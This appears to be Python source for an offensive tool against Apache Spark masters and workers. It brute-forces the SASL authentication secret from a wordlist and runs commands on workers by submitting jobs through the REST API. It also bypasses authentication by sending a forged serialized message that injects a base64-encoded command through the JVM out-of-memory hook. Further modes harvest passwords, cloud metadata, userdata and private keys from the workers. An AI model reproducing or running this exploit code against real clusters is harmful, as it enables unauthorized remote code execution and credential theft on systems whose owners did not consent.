def scalaCommandExec(sClient, jarURL, cmdFormatted, numWorkers):
    if distutils.spawn.find_executable("java") is None:
        whine("Could not find java binary in current PATH", "err")
        sys.exit(-1)

    deployMode, jarURI = (
        ("client", "./res/SimpleApp.jar") if jarURL == "client" else ("cluster", jarURL)
    )
    sparkSubmit, sparkArgs = sClient.getAll(jarURI, deployMode)
    jarArgs = " --class SimpleApp %s %s %s" % (
        jarURI,
        cmdFormatted.decode("utf-8"),
        numWorkers,
    )
    cmdLine = "%s %s %s" % (sparkSubmit, sparkArgs, jarArgs)

    whine("Initializing local Spark driver...This can take a little while", "info")
    code, out, err = _runLocalCMD(cmdLine)
    if code == 0 and deployMode == "client":
        whine("Command output\n", "good")
        print(out.decode("utf-8"))
    elif code == 0 and deployMode != "client":
        whine("Application submitted in cluster mode", "good")
    else:
        whine("Error submitting JAR file or executing code", "err")
        print(err.decode("utf-8"))
        sys.exit()
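# Sketch of the _runLocalCMD helper referenced above; its real implementation
# is not part of this section. This assumed version shells out through
# subprocess and returns (returncode, stdout, stderr) with the output as bytes.
def _runLocalCMD_sketch(cmdLine):
    import subprocess

    proc = subprocess.Popen(
        cmdLine, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
    )
    out, err = proc.communicate()
    return proc.returncode, out, err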
def _checkPyVersion(self):
    # .get avoids a KeyError when PYSPARK_PYTHON has not been set yet
    if sys.version_info[0] > 2 and os.environ.get("PYSPARK_PYTHON") == "python":
        whine(
            "Spark workers running a different version than Python %s.%s will throw errors. See -P option"
            % (sys.version_info[0], sys.version_info[1]),
            "warn",
        )
def validateYarnOptions(results):
    if results.yarn and results.hdfs == "None":
        whine(
            "Running in Yarn mode requires an HDFS cluster. Please add the option --hdfs ip:port",
            "err",
        )
        sys.exit(-1)
def performWork(self):
    if not self.isReady():
        whine(
            "Pyspark driver is not initialized. Remove conflicting options (e.g. -a)",
            "err",
        )
        sys.exit()
    # Trivial distributed job: forces Spark to schedule tasks on the workers
    self.sc.parallelize(range(0, 1), 10).filter(lambda x: x + 1).count()
def _checkListeningPorts(self):
    if self._is_port_in_use(self.driverPort) or self._is_port_in_use(
        self.blockManagerPort
    ):
        whine(
            "Make sure that both the driver port (-D) %s and block manager port (-B) %s are free to bind"
            % (self.driverPort, self.blockManagerPort),
            "err",
        )
        sys.exit(-1)
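# Sketch of the _is_port_in_use helper referenced above; its real
# implementation is not part of this section. This assumed version probes the
# local port and treats a successful connect as "in use".
def _is_port_in_use_sketch(port):
    import socket

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        return s.connect_ex(("127.0.0.1", port)) == 0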
def listNodes(self):
    if not self.isReady():
        whine(
            "Pyspark driver is not initialized. Remove conflicting options (e.g. -a)",
            "err",
        )
        sys.exit()
    self.performWork()
    return self.sc._jsc.sc().getExecutorMemoryStatus()
def startBruteforce(sClient, pool, wordlist):
    for word in open(wordlist, "r"):
        pool.add(
            pool.apply_async(
                isSecretSaslValid,
                args=(sClient, word.strip(), "sparkSaslUser", True),
                callback=checkResult,
            )
        )
    pool.join(timeout=30)
    pool.kill()
    whine("Could not find the secret", "warn")
def main(results):
    hostPort = results.spark_master.split(":")
    target = hostPort[0]
    port = 7077
    if len(hostPort) > 1:
        port = int(hostPort[1])
    wordlist = results.wordlist
    sClient = SparkClient(target, port, "0.0.0.0", "", "")
    pool = gevent.pool.Pool(results.threads)

    if not os.path.exists(wordlist):
        whine("Could not open wordlist file %s" % results.wordlist, "err")
        sys.exit(-1)

    whine("Starting bruteforce...", "info")
    startBruteforce(sClient, pool, wordlist)
def sendRestPost(self, url, jsonData, headers):
    try:
        rp = requests.post(url, timeout=3, headers=headers, json=jsonData)
        jsonResp = json.loads(rp.text)
        return jsonResp
    except (requests.exceptions.Timeout, requests.exceptions.RequestException):
        whine("No Rest API available at %s:%s" % (self.target, self.restPort), "warn")
        return None
    except Exception as err:
        whine(
            "Error connecting to REST API at %s:%s - %s"
            % (self.target, self.restPort, err),
            "err",
        )
        return None
def sendHTTPHello(self):
    try:
        rp = requests.get("http://%s:%s" % (self.target, self.httpPort), timeout=3)
        doc = html.fromstring(rp.text)
        return doc
    except (requests.exceptions.Timeout, requests.exceptions.RequestException):
        whine("No Web page available at %s:%s" % (self.target, self.httpPort), "warn")
        return None
    except Exception as err:
        whine(
            "Error connecting to Web page at %s:%s - %s"
            % (self.target, self.httpPort, err),
            "err",
        )
        return None
def sendRawMessage(self, nonce, payload, sock=None, wait_time=2):
    try:
        if sock is None:
            server_address = (self.target, self.port)
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(3)
            sock.connect(server_address)
        sock.send(nonce)
        sock.send(payload)
        respNone = sock.recv(13)  # discard the 13-byte frame header
        realResp = sock.recv(2048)
        time.sleep(wait_time)
        return realResp
    except socket.timeout:
        whine("Caught a timeout on target %s:%s" % (self.target, self.port), "err")
        return None
    except Exception as serr:
        # getattr guards against exceptions that carry no errno attribute
        if getattr(serr, "errno", None) == errno.ECONNREFUSED:
            whine(serr, "err")
            sys.exit(-1)
        whine(serr, "warn")
        return None
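# The raw frames sent above follow the layout that callers such as
# blindCommandExec (below) build by hand: 4 zero bytes, the total frame length
# (payload plus 13-byte header), a 0x09 message-type marker, then the payload
# length. A hypothetical helper packaging a payload the same way:
def _frame_payload_sketch(payload):
    import struct

    payloadSize = struct.pack(">I", len(payload))
    payloadSize13 = struct.pack(">I", len(payload) + 13)
    return b"\x00\x00\x00\x00" + payloadSize13 + b"\x09" + payloadSize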
def sendRestHello(self):
    try:
        rp = requests.get(
            "http://%s:%s/v1/submissions/status/1" % (self.target, self.restPort),
            timeout=3,
        )
        jsonData = json.loads(rp.text)
        return jsonData
    except (requests.exceptions.Timeout, requests.exceptions.RequestException):
        whine("No Rest API available at %s:%s" % (self.target, self.restPort), "warn")
        return None
    except Exception as err:
        whine(
            "Error connecting to REST API at %s:%s - %s"
            % (self.target, self.restPort, err),
            "err",
        )
        return None
def initContext(self):
    whine("Initializing local Spark driver...This can take a little while", "info")
    if self.conf is None:
        whine("Could not load Spark conf", "err")
        sys.exit(-1)
    if not self._check_authentication():
        whine(
            "Spark is protected with authentication. Either provide a secret (-S) or add the --blind option when executing a command to bypass authentication",
            "err",
        )
        sys.exit(-1)
    self._checkPyVersion()
    self._checkListeningPorts()
    self.sc = pyspark.SparkContext(conf=self.conf)
    self.sc.setLogLevel(self.logLevel)
    whine("Running driver version: %s" % self.sc.version, "info")
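# Hypothetical sketch of the kind of SparkConf that prepareConf (defined
# elsewhere in the tool) builds before initContext runs; the keys below are
# standard Spark properties, but the exact set the tool uses is an assumption.
#
#   conf = pyspark.SparkConf()
#   conf.setMaster("spark://%s:%s" % (self.target, self.port))
#   conf.setAppName(self.appName)
#   conf.set("spark.driver.host", self.localIP)
#   conf.set("spark.driver.port", self.driverPort)
#   conf.set("spark.blockManager.port", self.blockManagerPort)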
def restCommandExec(sClient, binPath, cmdFormatted, restJarURL, maxMem):
    headers = {"Content-Type": "application/json;charset=UTF-8"}
    payload = {
        "action": "CreateSubmissionRequest",
        "appArgs": ["Test"],
        "clientSparkVersion": "2.4.3",
        "environmentVariables": {"SPARK_ENV_LOADED": "1"},
        "mainClass": "Main",
        "sparkProperties": {
            "spark.driver.supervise": "false",
            "spark.app.name": sClient.appName,
            "spark.submit.deployMode": "cluster",
        },
    }
    if restJarURL == "spark://%s:%s":
        # Default value: point the jar URL at the master itself and trigger
        # the command through the driver's out-of-memory handler
        restJarURL = "spark://%s:%s" % (sClient.target, sClient.port)
        payload["sparkProperties"]["spark.jars"] = restJarURL
        payload["sparkProperties"]["spark.driver.extraJavaOptions"] = (
            "-Xmx%sm -XX:OnOutOfMemoryError=echo${IFS}%s${IFS}|base64${IFS}-d|%s"
            % (maxMem.zfill(2), cmdFormatted.decode("utf-8"), binPath)
        )
    else:
        try:
            fqdnJar = restJarURL.split("::")[0]
            mainClass = restJarURL.split("::")[1]
            payload["sparkProperties"]["spark.jars"] = fqdnJar
            payload["mainClass"] = mainClass
        except Exception as err:
            whine(
                "Error parsing URL jar file. Please follow instructions in help page. %s"
                % err,
                "err",
            )
            return None
    payload["appResource"] = payload["sparkProperties"]["spark.jars"]
    payload["sparkProperties"]["spark.master"] = "spark://%s:%s" % (
        sClient.target,
        sClient.restPort,
    )
    url = "http://%s:%s/v1/submissions/create" % (sClient.target, sClient.restPort)
    resp = sClient.sendRestPost(url, payload, headers)
    if resp is not None and resp["success"]:
        whine("Command successfully executed on a random worker", "good")
        return True
    else:
        whine("Something went wrong", "err")
        sys.exit(-1)
def blindCommandExec(sClient, binPath, cmdFormatted, maxMem):
    # Pre-serialized RegisterApplication message; all fragments must be bytes
    # literals so the concatenation works under Python 3
    serialID = b"\xcd\xc3\xc2\x81N\x03\xff\x02"
    holder = (
        b"\x01\x00\x0c192.168.1.22\x00\x00E\xb1\x01\x00\x0c192.168.1.24\x00\x00\x1b\xa5\x00\x06Master\xac\xed\x00\x05sr\x00:org.apache.spark.deploy.DeployMessages$RegisterApplication\xb3\xbd\x8d\xd3\x06\t\x1f\xef\x02\x00\x02L\x00\x0eappDescriptiont\x000Lorg/apache/spark/deploy/ApplicationDescription;L\x00\x06drivert\x00%Lorg/apache/spark/rpc/RpcEndpointRef;xpsr\x00.org.apache.spark.deploy.ApplicationDescriptionZ"
        + serialID
        + b"\x00\nI\x00\x13memoryPerExecutorMBL\x00\x08appUiUrlt\x00\x12Ljava/lang/String;L\x00\x07commandt\x00!Lorg/apache/spark/deploy/Command;L\x00\x10coresPerExecutort\x00\x0eLscala/Option;L\x00\reventLogCodecq\x00~\x00\x07L\x00\x0beventLogDirq\x00~\x00\x07L\x00\x14initialExecutorLimitq\x00~\x00\x07L\x00\x08maxCoresq\x00~\x00\x07L\x00\x04nameq\x00~\x00\x05L\x00\x04userq\x00~\x00\x05xp\x00\x00\x04\x00t\x00\x18http://192.168.1.22:4040sr\x00\x1forg.apache.spark.deploy.Command\x9d}\xbf\r\xfdQj\xbd\x02\x00\x06L\x00\targumentst\x00\x16Lscala/collection/Seq;L\x00\x10classPathEntriesq\x00~\x00\x0bL\x00\x0benvironmentt\x00\x16Lscala/collection/Map;L\x00\x08javaOptsq\x00~\x00\x0bL\x00\x12libraryPathEntriesq\x00~\x00\x0bL\x00\tmainClassq\x00~\x00\x05xpsr\x002scala.collection.immutable.List$SerializationProxy\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x00xpt\x00\x0c--driver-urlt\x001spark://[email protected]:17841t\x00\r--executor-idt\x00\x0f{{EXECUTOR_ID}}t\x00\n--hostnamet\x00\x0c{{HOSTNAME}}t\x00\x07--corest\x00\t{{CORES}}t\x00\x08--app-idt\x00\n{{APP_ID}}t\x00\x0c--worker-urlt\x00\x0e{{WORKER_URL}}sr\x00,scala.collection.immutable.ListSerializeEnd$\x8a\\c[\xf7S\x0bm\x02\x00\x00xpxsq\x00~\x00\x0eq\x00~\x00\x1dxsr\x00 scala.collection.mutable.HashMap\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x00xpw\r\x00\x00\x02\xee\x00\x00\x00\x02\x00\x00\x00\x04\x00t\x00\nSPARK_USERt\x00\x06lambdat\x00\x15SPARK_EXECUTOR_MEMORYt\x00\x051024mxsr\x00!scala.collection.mutable.ArraySeq\x15<=\xd2(I\x0es\x02\x00\x02I\x00\x06length[\x00\x05arrayt\x00\x13[Ljava/lang/Object;xp\x00\x00\x00\x03ur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\x03t\x00\x19-Dspark.driver.port=17841t\x00&-XX:OnOutOfMemoryError=/tmp/scripts.sht\x00\x07-Xmx"
        + maxMem.zfill(2).encode("utf-8")
        + b'mq\x00~\x00\x1et\x006org.apache.spark.executor.CoarseGrainedExecutorBackendsr\x00\x0bscala.None$FP$\xf6S\xca\x94\xac\x02\x00\x00xr\x00\x0cscala.Option\xfei7\xfd\xdb\x0eft\x02\x00\x00xpq\x00~\x000sr\x00\nscala.Some\x11"\xf2i^\xa1\x8bt\x02\x00\x01L\x00\x01xt\x00\x12Ljava/lang/Object;xq\x00~\x00/sr\x00\x0cjava.net.URI\xac\x01x.C\x9eI\xab\x03\x00\x01L\x00\x06stringq\x00~\x00\x05xpt\x00\x1afile:/C:/tmp/spark-events/xq\x00~\x000q\x00~\x000t\x00\x08testtestt\x00\x06lambdasr\x00.org.apache.spark.rpc.netty.NettyRpcEndpointRefV\xd5\x9fC\xdd\xe7\xe82\x03\x00\x01L\x00\x0fendpointAddresst\x00)Lorg/apache/spark/rpc/RpcEndpointAddress;xr\x00#org.apache.spark.rpc.RpcEndpointRef\xed\x8d\xff\xc5]\x08\xa0\xd2\x02\x00\x03I\x00\nmaxRetriesJ\x00\x0bretryWaitMsL\x00\x11defaultAskTimeoutt\x00!Lorg/apache/spark/rpc/RpcTimeout;xp\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x0b\xb8sr\x00\x1forg.apache.spark.rpc.RpcTimeout\xb5\x84I\xce\xfd\x9bP\x15\x02\x00\x02L\x00\x08durationt\x00*Lscala/concurrent/duration/FiniteDuration;L\x00\x0btimeoutPropq\x00~\x00\x05xpsr\x00(scala.concurrent.duration.FiniteDuration\xf2Z8LLZ\xa8j\x02\x00\x02J\x00\x06lengthL\x00\x04unitt\x00\x1fLjava/util/concurrent/TimeUnit;xr\x00"scala.concurrent.duration.Duration\x97\x9d0tfJI\xf0\x02\x00\x00xp\x00\x00\x00\x00\x00\x00\x00x~r\x00\x1djava.util.concurrent.TimeUnit\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00xr\x00\x0ejava.lang.Enum\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00xpt\x00\x07SECONDSt\x00\x14spark.rpc.askTimeoutsr\x00\'org.apache.spark.rpc.RpcEndpointAddress\xcb_\x95\xe3+}\xc3\xf8\x02\x00\x03L\x00\x04nameq\x00~\x00\x05L\x00\nrpcAddresst\x00!Lorg/apache/spark/rpc/RpcAddress;L\x00\x08toStringq\x00~\x00\x05xpt\x00\tAppClientsr\x00\x1forg.apache.spark.rpc.RpcAddress\xe5\xa2\x067\x80c\xb2\x0f\x02\x00\x02I\x00\x04portL\x00\x04hostq\x00~\x00\x05xp\x00\x00E\xb1t\x00\x0c192.168.1.22t\x00$spark://[email protected]:17841x'
    )
    whine("Executing command on a random worker", "info")
    cmd = "-XX:OnOutOfMemoryError=echo\t%s\t|base64\t-d|%s" % (
        cmdFormatted.decode("utf-8"),
        binPath,
    )
    cmdSize = struct.pack(">H", len(cmd))
    appNameSize = struct.pack(">H", len(sClient.appName))
    usernameSize = struct.pack(">H", len(sClient.username))
    # Splice the command, app name, and username into the serialized template
    payload = (
        holder[:1416]
        + cmdSize
        + cmd.encode("utf-8")
        + holder[1456:1728]
        + appNameSize
        + sClient.appName.encode("utf-8")
        + b"t"
        + usernameSize
        + sClient.username.encode("utf-8")
        + holder[1747:]
    )
    payloadSize = struct.pack(">I", len(payload))
    payloadSize13 = struct.pack(">I", len(payload) + 13)
    nonce = b"\x00\x00\x00\x00" + payloadSize13 + b"\x09" + payloadSize
    resp = sClient.sendRawMessage(nonce, payload, wait_time=20)
    if resp is not None and "RegisteredApplication" in resp.decode("utf-8", "ignore"):
        whine("Positive response from the Master", "good")
        whine(
            "If cmd failed, adjust the -m param to make sure to cause an out of memory error",
            "info",
        )
    else:
        whine("Something went wrong", "err")
def sendHello(self):
    if self.yarn:
        return True
    nonce = b"\x00\x00\x00\x00\x00\x00\x00\xc5\x03\x62\x05\x32\x92\xe7\xca\x6d\xaa\x00\x00\x00\xb0"
    hello = (
        b"\x01\x00\x0c\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x32\x31\x00"
        b"\x00\xe7\x44\x01\x00\x0c\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e"
        b"\x32\x38\x00\x00\x1b\xa5\x00\x11\x65\x6e\x64\x70\x6f\x69\x6e\x74"
        b"\x2d\x76\x65\x72\x69\x66\x69\x65\x72\xac\xed\x00\x05\x73\x72\x00"
        b"\x3d\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x73\x70\x61\x72"
        b"\x6b\x2e\x72\x70\x63\x2e\x6e\x65\x74\x74\x79\x2e\x52\x70\x63\x45"
        b"\x6e\x64\x70\x6f\x69\x6e\x74\x56\x65\x72\x69\x66\x69\x65\x72\x24"
        b"\x43\x68\x65\x63\x6b\x45\x78\x69\x73\x74\x65\x6e\x63\x65\x6c\x19"
        b"\x1e\xae\x8e\x40\xc0\x1f\x02\x00\x01\x4c\x00\x04\x6e\x61\x6d\x65"
        b"\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74"
        b"\x72\x69\x6e\x67\x3b\x78\x70\x74\x00\x06\x4d\x61\x73\x74\x65\x72"
    )
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server_address = (self.target, self.port)
        sock.settimeout(3)
        sock.connect(server_address)
        sock.send(nonce)
        sock.send(hello)
        respNone = sock.recv(21)
        respNone2 = sock.recv(200)
        if "Expected SaslMessage" in respNone2.decode("utf-8", "ignore"):
            self.requiresAuthentication = True
        if len(respNone) == 21 and respNone[10] == nonce[10]:
            return True
    except socket.timeout:
        whine("Caught a timeout on target %s:%s" % (self.target, self.port), "err")
        sys.exit(-1)
    except Exception as serr:
        # getattr guards against exceptions that carry no errno attribute
        if getattr(serr, "errno", None) == errno.ECONNREFUSED:
            whine(serr, "err")
            sys.exit(-1)
        whine(serr, "warn")
    return False
def isSecretSaslValid(sClient, secret, username="******", quiet=False):
    sock = _setup_socket(sClient)
    rawServerChall = getServerChallenge(sClient, sock)
    if rawServerChall is None:
        # Could not fetch the server SASL challenge; reducing the number of
        # pools may help
        return None
    saslNonce, realm, algorithm = extractSaslParams(rawServerChall)
    if algorithm != "md5-sess":
        # Unexpected algorithm: cannot check the secret provided
        return None
    if saslNonce is None or realm is None:
        # Got a null SASL nonce or realm
        return None
    serverResp = sendChallenge(sClient, saslNonce, realm, secret, username, sock)
    if serverResp is None:
        whine("Could not authenticate to the Spark server", "err")
        return None
    serverResp = serverResp.decode("utf-8", "ignore")
    if "rspauth=" in serverResp:
        return secret
    elif "SaslException" in serverResp:
        saslException = re.search(
            r"javax\.security\.sasl\.SaslException: ([\w\d -_.,]+)\n",
            serverResp,
            re.IGNORECASE,
        )
        if not quiet:
            whine("Got sasl exception from server when submitting challenge", "err")
            if saslException:
                whine(saslException.group(1), "err")
    return False
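# Sketch of the _setup_socket helper referenced above; its real implementation
# is not part of this section. This assumed version opens a plain TCP
# connection to the Spark master with a short timeout.
def _setup_socket_sketch(sClient):
    import socket

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(3)
    sock.connect((sClient.target, sClient.port))
    return sock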
def main(results):
    hostPort = results.spark_master.split(":")
    localIP = results.driver_ip
    appName = results.appName
    username = results.username
    target = hostPort[0]
    binPath = results.binPath
    restJarURL = results.restJarURL
    useScala = results.useScala
    pyBinary = results.pyBinary
    useRest = False
    useBlind = False
    port = 8032 if results.yarn else 7077
    if len(hostPort) > 1:
        port = int(hostPort[1])
    if results.yarn:
        validateYarnOptions(results)

    sClient = SparkClient(target, port, localIP, appName, username)
    sClient.restPort = results.restPort
    sClient.httpPort = results.httpPort
    sClient.blockManagerPort = results.blockManagerPort
    sClient.driverPort = results.driverPort
    if results.yarn:
        sClient.yarn = True
        sClient.hdfs = results.hdfs

    if results.restJarURL is not None:
        useRest = True
        if not results.cmd and not results.script:
            whine(
                "Please provide a command (-c) or script (-s) to execute via REST",
                "err",
            )
            sys.exit(-1)

    confirmSpark(sClient)
    sClient.prepareConf(results.secret, results.pyBinary)

    if len(results.secret) > 0:
        validSecret = isSecretSaslValid(sClient, results.secret)
        if validSecret:
            whine("Successful authentication on Spark master", "good")
        elif validSecret is None:
            whine("Could not reliably validate the secret provided", "warn")
        else:
            whine("Failed authentication using the secret provided", "err")
            sys.exit(-1)

    if results.info:
        checkRestPort(sClient)
        gotInfo = checkHTTPPort(sClient)
        if not gotInfo:
            sClient.initContext()
            parseListNodes(sClient)
        sys.exit(0)

    if results.blind:
        whine("Performing blind command execution on workers", "info")
        useBlind = True
    elif sClient.sc is None and not useRest and not useScala:
        sClient.initContext()
    print("")

    if results.listFiles:
        listCMD = 'find "$(cd ../..; pwd)" -type f -name "{0}" -printf "%M\t%u\t%g\t%6k KB\t%Tc\t%p\n" |grep -v stderr |grep -v stdout'.format(
            results.extension
        )
        interpreterArgs = ["/bin/bash", "-c", listCMD]
        parseCommandOutput(sClient, interpreterArgs, results.numWorkers)

    if results.passwdInFile:
        whine("Searching for secrets on workers", "info")
        scriptContent = open("./utils/searchPass.py", "r").read()
        interpreterArgs = [pyBinary, "-c", scriptContent, results.extension]
        parseCommandOutput(sClient, interpreterArgs, results.numWorkers)

    if results.cmd:
        if useBlind:
            blindCommandExec(
                sClient,
                binPath,
                base64.b64encode(results.cmd.encode("utf-8")),
                results.maxMem,
            )
        elif useRest:
            # encode before b64encode: b64encode requires bytes under Python 3
            restCommandExec(
                sClient,
                binPath,
                base64.b64encode(results.cmd.encode("utf-8")),
                restJarURL,
                results.maxMem,
            )
        elif useScala:
            hydratedCMD = "rm -f *.jar 2> /dev/null; %s" % results.cmd
            scalaCommandExec(
                sClient,
                results.jarURL,
                base64.b64encode(hydratedCMD.encode("utf-8")),
                results.numWorkers,
            )
        else:
            interpreterArgs = [binPath, "-c", results.cmd]
            parseCommandOutput(sClient, interpreterArgs, results.numWorkers)

    if results.script:
        scriptContent = results.script.read().encode("utf-8")
        if useBlind:
            blindCommandExec(
                sClient, binPath, base64.b64encode(scriptContent), results.maxMem
            )
        elif useRest:
            restCommandExec(
                sClient,
                binPath,
                base64.b64encode(scriptContent),
                restJarURL,
                results.maxMem,
            )
        elif useScala:
            hydratedCMD = b"rm *.jar 2> /dev/null;%s" % scriptContent
            scalaCommandExec(
                sClient,
                results.jarURL,
                base64.b64encode(hydratedCMD),
                results.numWorkers,
            )
        else:
            interpreterArgs = [binPath, "-c", scriptContent]
            parseCommandOutput(sClient, interpreterArgs, results.numWorkers)

    if results.metadata:
        scriptContent = open("./utils/cloud.py", "r").read()
        interpreterArgs = [pyBinary, "-c", scriptContent, "metadata"]
        parseCommandOutput(sClient, interpreterArgs, results.numWorkers)

    if results.userdata:
        scriptContent = open("./utils/cloud.py", "r").read()
        interpreterArgs = [pyBinary, "-c", scriptContent, "userdata"]
        parseCommandOutput(sClient, interpreterArgs, results.numWorkers)

    if results.privatekey:
        scriptContent = open("./utils/cloud.py", "r").read()
        interpreterArgs = [pyBinary, "-c", scriptContent, "privatekey"]
        parseCommandOutput(sClient, interpreterArgs, results.numWorkers)
def checkResult(validSecret):
    if validSecret:
        whine("Successful authentication on Spark master: %s" % validSecret, "good")
        print("--- %s seconds ---" % (time.time() - start_time))
        sys.exit(0)
def parseCommandOutput(sClient, interpreterArgs, numWorkers):
    whine("Executing command on %d worker(s)" % numWorkers, "info")
    listOutput = sClient.executeCMD(interpreterArgs, numWorkers)
    for i, out in enumerate(listOutput):
        whine("Output of worker %d" % i, "good")
        print(out.decode("utf-8"))
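# Illustrative usage of parseCommandOutput (assumed call pattern, not part of
# the tool): run `id` through /bin/bash on two workers and print each output.
#
#   parseCommandOutput(sClient, ["/bin/bash", "-c", "id"], 2)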